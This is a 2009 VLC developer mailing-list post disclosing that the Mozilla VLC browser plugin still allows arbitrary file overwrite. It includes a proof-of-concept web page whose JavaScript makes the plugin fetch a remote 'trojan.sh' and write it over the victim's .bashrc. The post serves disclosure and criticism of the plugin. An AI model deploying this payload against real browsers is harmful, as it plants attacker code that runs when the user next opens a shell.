[vlc-devel] Regarding the seemingly still "obscure" security problem

Rémi Denis-Courmont rdenis at simphalempin.com
Sat Jan 17 14:26:25 CET 2009

	Good news everyone!

As pointed out over a year ago, I am not reckless enough to build, or worse, 
use the Mozilla VLC plugin: 

However, a recent post on the VideoLAN forums made me try it again: 

For obvious reasons, I don't build bother to build the Mozilla VLC 
trojan^Wplugin from my bugfix and development trees, so I am unable to test 
version 0.8.6h from the Debian Lenny package. As far as I can tell, this 
still works as well as it did a year ago:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<title>VLC browser plugin file overwrite page</title>
<embed type="application/x-vlc-plugin" 
<script type="text/javascript"><!--
  var vlc = document.getElementById("vlc");
  var src = "http/dump://www.example.com/trojan.sh";
  var dst = ".bashrc";
  vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
  vlc.playlist.play ();

I guess OSX users should be happy that it does not work on their platform 
anymore. If it were up to me, the browser crap^Wplugins would not be in the 
main tree. 

Rémi Denis-Courmont

More information about the vlc-devel mailing list